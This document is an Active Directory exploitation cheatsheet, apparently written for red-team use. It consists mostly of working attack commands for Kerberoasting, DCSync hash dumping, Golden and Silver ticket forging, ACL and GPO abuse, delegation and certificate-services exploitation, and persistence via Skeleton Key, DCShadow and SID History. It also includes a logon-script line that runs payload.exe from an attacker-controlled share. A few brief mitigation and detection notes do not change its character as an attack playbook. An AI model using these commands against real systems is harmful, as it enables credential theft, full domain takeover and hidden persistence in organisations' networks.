AD-EXPLOITATION
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
Active Directory (AD) is the backbone of most enterprise Windows networks. This cheatsheet covers common AD attack paths, exploitation techniques, and persistence mechanisms used during red team engagements.
ENUMERATION (PRE-EXPLOITATION)#
# BloodHound collection SharpHound.exe -c All --outputdirectory C:\temp bloodhound-python -c All -u user -p pass -d domain.local -ns DC_IP # PowerView Get-DomainUser -SPN # Find Kerberoastable users Get-DomainUser -PreauthNotRequired # Find AS-REP roastable users Get-DomainComputer -Unconstrained # Find unconstrained delegation Get-DomainUser -TrustedToAuth # Find constrained delegation Get-DomainGPO | Get-ObjectAcl # GPO permissions Find-InterestingDomainAcl # DACL misconfigurations # LDAP queries (ldapsearch) ldapsearch -x -H ldap://DC_IP -D "user@domain.local" -w pass -b "DC=domain,DC=local" "(servicePrincipalName=*)" samaccountname,serviceprincipalname # Enum4linux-ng enum4linux-ng -A TARGET
KERBEROASTING#
Request service tickets for accounts with SPNs, then crack offline. Any authenticated domain user can perform this attack. # Impacket GetUserSPNs.py domain.local/user:pass -dc-ip DC_IP -request -outputfile kerberoast.txt # Rubeus Rubeus.exe kerberoast /outfile:kerberoast.txt Rubeus.exe kerberoast /user:svc_account /outfile:kerberoast.txt # PowerView + Invoke-Kerberoast Invoke-Kerberoast -OutputFormat hashcat | Select Hash | Out-File kerberoast.txt # Crack with Hashcat (mode 13100 for TGS-REP) hashcat -m 13100 kerberoast.txt wordlist.txt -r rules/best64.rule # Crack with John john --format=krb5tgs kerberoast.txt --wordlist=wordlist.txt Mitigation: Use 25+ char passwords for service accounts, use gMSA, avoid setting SPNs on privileged accounts.
AS-REP ROASTING#
Target accounts with Kerberos pre-authentication disabled. Request AS-REP and crack offline. # Impacket (no creds needed if you have a username list) GetNPUsers.py domain.local/ -dc-ip DC_IP -usersfile users.txt -no-pass -outputfile asrep.txt # Rubeus Rubeus.exe asreproast /outfile:asrep.txt Rubeus.exe asreproast /user:targetuser /outfile:asrep.txt # Crack with Hashcat (mode 18200 for AS-REP) hashcat -m 18200 asrep.txt wordlist.txt -r rules/best64.rule Mitigation: Enable pre-authentication for all accounts, monitor for Event 4768 with pre-auth type 0.
DCSYNC#
Replicate domain controller data using Directory Replication Service (DRS). Requires: Replicating Directory Changes + Replicating Directory Changes All. # Mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt lsadump::dcsync /domain:domain.local /user:Administrator lsadump::dcsync /domain:domain.local /all /csv # Impacket secretsdump.py domain.local/user:pass@DC_IP secretsdump.py -hashes :NTLM_HASH domain.local/user@DC_IP secretsdump.py -just-dc-ntlm domain.local/user:pass@DC_IP Detection: Event 4662 with Replication-Get-Changes-All property, DRS requests from non-DC sources.
GOLDEN TICKET#
Forge a TGT using the krbtgt hash. Grants access to any resource in the domain. # Mimikatz kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /krbtgt:KRBTGT_NTLM_HASH /ptt # With AES key (stealthier) kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /aes256:AES_KEY /ptt # Impacket ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-DOMAIN-SID -domain domain.local Administrator export KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass domain.local/Administrator@DC # Rubeus Rubeus.exe golden /rc4:KRBTGT_HASH /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /ptt Detection: TGT with abnormally long lifetime, Event 4769 with unusual encryption type, PAC validation failures.
SILVER TICKET#
Forge a TGS for a specific service using the service account's hash. More targeted than Golden Ticket (no KDC interaction needed). # Mimikatz kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-DOMAIN-SID /target:server.domain.local /service:cifs /rc4:SERVICE_NTLM_HASH /ptt # Impacket ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-DOMAIN-SID -domain domain.local -spn cifs/server.domain.local Administrator Common services: cifs, http, mssql, ldap, host, rpcss Detection: TGS without prior TGT request, PAC validation.
DACL ABUSE#
Exploit misconfigured Access Control Lists on AD objects.
GenericAll on User:
# Reset password
net user targetuser NewPass123! /domain
# Set SPN for Kerberoasting
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='nonexistent/YOURSERVICE'}
# Targeted Kerberoasting
Rubeus.exe kerberoast /user:targetuser
GenericAll on Group:
# Add yourself to the group
net group "Domain Admins" youruser /add /domain
Add-DomainGroupMember -Identity "Domain Admins" -Members youruser
GenericWrite on User:
# Set SPN for Kerberoasting
# Modify logon script
Set-DomainObject -Identity targetuser -Set @{scriptpath='\\ATTACKER\share\payload.exe'}
WriteDACL:
# Grant yourself DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity youruser -Rights DCSync
WriteOwner:
# Take ownership, then modify DACL
Set-DomainObjectOwner -Identity targetobject -OwnerIdentity youruser
ForceChangePassword:
# Reset user's password without knowing current
Set-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)
GPO ABUSE#
Exploit permissions on Group Policy Objects to execute code domain-wide.
# Enumerate GPO permissions
Get-DomainGPO | Get-ObjectAcl | ? {$_.ActiveDirectoryRights -match "WriteProperty|GenericAll"}
# SharpGPOAbuse - add immediate scheduled task
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c payload.exe" --GPOName "Vulnerable GPO"
# SharpGPOAbuse - add local admin
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount youruser --GPOName "Vulnerable GPO"
# Force GPO update
gpupdate /force
DELEGATION ATTACKS#
Unconstrained Delegation: # Server stores user's TGT; can impersonate any user who connects # Find unconstrained delegation computers Get-DomainComputer -Unconstrained # Use SpoolSample/PrinterBug to coerce DC authentication SpoolSample.exe DC_NAME UNCONSTRAINED_HOST # Monitor for TGT with Rubeus Rubeus.exe monitor /interval:5 /nowrap # Pass the captured TGT Rubeus.exe ptt /ticket:BASE64_TICKET Constrained Delegation: # Service can impersonate users to specific services # Find constrained delegation Get-DomainUser -TrustedToAuth Get-DomainComputer -TrustedToAuth # Rubeus S4U attack Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt # Impacket getST.py -spn cifs/target.domain.local -impersonate Administrator domain.local/svc_account:pass Resource-Based Constrained Delegation (RBCD): # Requires write access to target's msDS-AllowedToActOnBehalfOfOtherIdentity # Create computer account (default: any user can create up to 10) addcomputer.py -computer-name 'FAKE$' -computer-pass 'Password123' domain.local/user:pass # Set RBCD rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET$' -action write domain.local/user:pass # Get ticket getST.py -spn cifs/TARGET.domain.local -impersonate Administrator domain.local/'FAKE$':'Password123'
CERTIFICATE ABUSE (AD CS)#
Active Directory Certificate Services exploitation.
# Enumerate with Certipy
certipy find -u user@domain.local -p pass -dc-ip DC_IP
ESC1 - Enrollee supplies subject (SAN)
certipy req -u user@domain.local -p pass -ca CA-NAME -template VulnTemplate -upn administrator@domain.local
certipy auth -pfx administrator.pfx
ESC2 - Any Purpose EKU or SubCA template
# Similar to ESC1 but exploits Any Purpose or SubCA EKU
ESC3 - Enrollment Agent template abuse
# Enroll in agent cert, then use it to enroll on behalf of another user
ESC4 - Vulnerable template ACL
# Modify template to enable ESC1 conditions, then exploit
ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 flag on CA
# CA allows SAN specification in any request
certipy req -u user@domain.local -p pass -ca CA-NAME -template User -upn administrator@domain.local
ESC7 - Vulnerable CA ACL (ManageCA/ManageCertificates)
# Use ManageCA to enable ESC6 flag, then exploit
ESC8 - NTLM Relay to AD CS HTTP endpoint
# Coerce authentication and relay to /certsrv/certfnsh.asp
ntlmrelayx.py -t http://CA-SERVER/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Authenticate with certificate
certipy auth -pfx cert.pfx -dc-ip DC_IP
PERSISTENCE MECHANISMS#
Skeleton Key: # Injects into LSASS on DC; allows auth with master password # Requires DA or SYSTEM on DC mimikatz# privilege::debug mimikatz# misc::skeleton # Now authenticate as any user with password "mimikatz" # Does NOT survive DC reboot AdminSDHolder: # Modify AdminSDHolder ACL; propagates to all protected groups every 60 min Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity youruser -Rights All # Wait 60 minutes (or trigger SDProp manually) DCShadow: # Register rogue DC and push changes via replication # Requires DA privileges mimikatz# lsadump::dcshadow /object:targetuser /attribute:primaryGroupID /value:512 # In another Mimikatz instance mimikatz# lsadump::dcshadow /push SID History: # Add Domain Admin SID to a regular user's SID history mimikatz# sid::patch mimikatz# sid::add /sam:youruser /new:S-1-5-21-DOMAIN-SID-512 Security Descriptor Persistence: # Add hidden DACL entry for remote WMI/PSRemoting access Set-RemoteWMI -UserName youruser -ComputerName DC -Credential $cred Set-RemotePSRemoting -UserName youruser -ComputerName DC -Credential $cred
ESSENTIAL TOOLS#
BloodHound/SharpHound - AD relationship mapping and attack path analysis Mimikatz - Credential extraction, ticket forging, DCSync Rubeus - Kerberos attacks (roasting, S4U, ticket manipulation) Impacket - Python tools for AD protocols (secretsdump, getST, etc.) Certipy - AD CS enumeration and exploitation PowerView - AD enumeration via PowerShell CrackMapExec/NetExec - Swiss army knife for AD exploitation SharpGPOAbuse - GPO exploitation Whisker - Shadow Credentials attack KrbRelayUp - Local privilege escalation via Kerberos relay
ATTACK PATH SUMMARY#
1. Enumerate (BloodHound, PowerView, ldapsearch) 2. Kerberoast / AS-REP roast for initial credentials 3. Check DACL misconfigurations for privilege paths 4. Exploit delegation for impersonation 5. Check AD CS for certificate abuse 6. DCSync for full domain hash extraction 7. Golden Ticket for persistent domain access 8. Establish persistence (AdminSDHolder, SID History, certs)